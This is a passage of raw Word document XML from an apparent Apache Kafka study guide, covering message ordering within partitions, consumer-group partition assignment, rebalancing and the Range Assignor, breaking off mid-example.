          <w:numId w:val="244"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If strict message ordering is required across different types of messages, you should use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for those messages, but keep in mind that this may limit the scalability of your Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B43512A" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D" w:rsidP="0086529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D7E78" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ordering is guaranteed </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F397CA2" w14:textId="77777777" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ordering is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guaranteed across partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8720C7" w14:textId="24C612F2" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086529D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="49A39CE0">
          <v:rect id="_x0000_i3078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7DECB" w14:textId="5BFC5215" w:rsidR="006E0265" w:rsidRPr="00CE4B95" w:rsidRDefault="005A4658">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="766" w:name="_Toc196308246"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does partition assignment happen? What method is used</w:t>
      </w:r>
      <w:r w:rsidR="006E0265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="766"/>
    </w:p>
    <w:p w14:paraId="6161EA08" w14:textId="23E893CC" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="00930264">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the process of determining which consumer in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should consume messages from which partition. This assignment is crucial for ensuring that messages are distributed across consumers, enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C2228" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How Partition Assignment Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D970590" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created and consumers join that group, Kafka automatically assigns partitions to the consumers in the group based on certain algorithms. The key goals are to ensure that each partition is assigned to exactly one consumer within the group and that the load is balanced among all consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BD4586" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Points of Partition Assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4920E1D9" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each Partition Is Assigned to One Consumer in a Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D851634" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each partition of a topic is assigned to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This ensures that each message within a partition is consumed only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B19099" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If a consumer fails or leaves the group, Kafka will reassign the partitions to the remaining consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480510E7" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05664729" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a new consumer joins or an existing consumer leaves the group, Kafka performs a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reassign partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4B02F" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>During a rebalance, Kafka ensures that partitions are evenly distributed across available consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7CF11" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition Assignment Strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses different strategies to determine how to assign partitions to consumers within a group. The two main partition assignment strategies in Kafka are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFB0C4" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Range Assignor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED3722" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Range Assignor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> assigns a range of partitions to each consumer. If there are 6 partitions and 3 consumers, the partitions will be divided into ranges, with each consumer being responsible for a set of contiguous partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68C46E" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544488D3" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
